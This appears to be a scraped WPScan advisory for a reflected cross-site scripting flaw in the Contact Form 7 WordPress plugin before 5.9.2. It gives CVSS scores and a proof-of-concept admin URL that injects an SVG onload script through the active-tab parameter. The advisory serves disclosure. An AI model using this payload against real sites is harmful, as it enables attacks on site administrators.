Lucene search

K
wpexploitWpvulndbWPEX-ID:1C070A2C-2AB0-43BF-B10B-6575709918BC
HistoryMar 13, 2024 - 12:00 a.m.

Contact Form 7 < 5.9.2 - Reflected Cross-Site Scripting

2024-03-1300:00:00
wpvulndb
243
contact form 7
cross-site scripting
vulnerability
active-tab parameter
exploit

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.0004 Low

EPSS

Percentile

9.0%

Description The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators.

http://vulnerable-site.tld/wp-admin/admin.php?page=wpcf7&post=$FORMID&active-tab=1%22%3E%3Csvg%2Fonload%3Dalert%281%29%2F%2F%3E

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.0004 Low

EPSS

Percentile

9.0%

Related for WPEX-ID:1C070A2C-2AB0-43BF-B10B-6575709918BC